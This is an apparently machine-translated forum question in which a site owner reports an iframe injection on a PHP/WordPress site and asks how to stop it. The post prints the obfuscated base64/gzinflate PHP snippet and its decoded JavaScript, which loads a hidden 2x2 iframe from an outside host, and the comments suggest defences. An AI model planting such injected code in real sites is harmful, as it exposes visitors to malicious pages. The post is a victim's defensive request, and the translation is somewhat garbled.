在过去的几天里,我的网站一直是iframe攻击的目标。代码主要附加到PHP和Javascript页面。该代码是那么PHP基地64编码,见例子(我已经改变了代码稍微中和它):网站iframe攻击 - 插入源代码
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
该解码看起来是这样的:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
的有一点是共同的,那就是所有代码都有注释“#c3284d#”,因此追踪恶意代码并不困难。但它很费时间...
我们在Gradwell(英国)的共享服务器上,它们并没有特别有用。 所以问题是我能做些什么来阻止这个问题重演呢? 我知道MySQL注入攻击并使用PHP的mysql_real_escape_string来防范此类攻击。
该网站是PHP和MySQL驱动器。 我们使用MySQLFTP并拥有一个用于SSH访问的shell帐户。 我们使用WordPress(最新的更新与插件停用)。
关于这类问题存在很多关于这种问题的PHP知识,我鼓励你去寻找它。然而,对这个问题的横向思考的答案是“[使用PHP以外的东西。](http://me.veekun.com/blog/2012/04/09/php-a-fractal-of-bad-design/)”PHP比安全问题更容易发生其他语言 – 2012-07-28 05:39:12
一个古老的问题,但仍然值得一提:获取一个散列扫描器并将其安装到您的帐户中。PHP中有很多,从我可以告诉。这些使用cron来检查哪些文件是新的或已更改,并且如果发现可疑更改,可以通过电子邮件发送给您。 – halfer 2012-12-10 21:43:46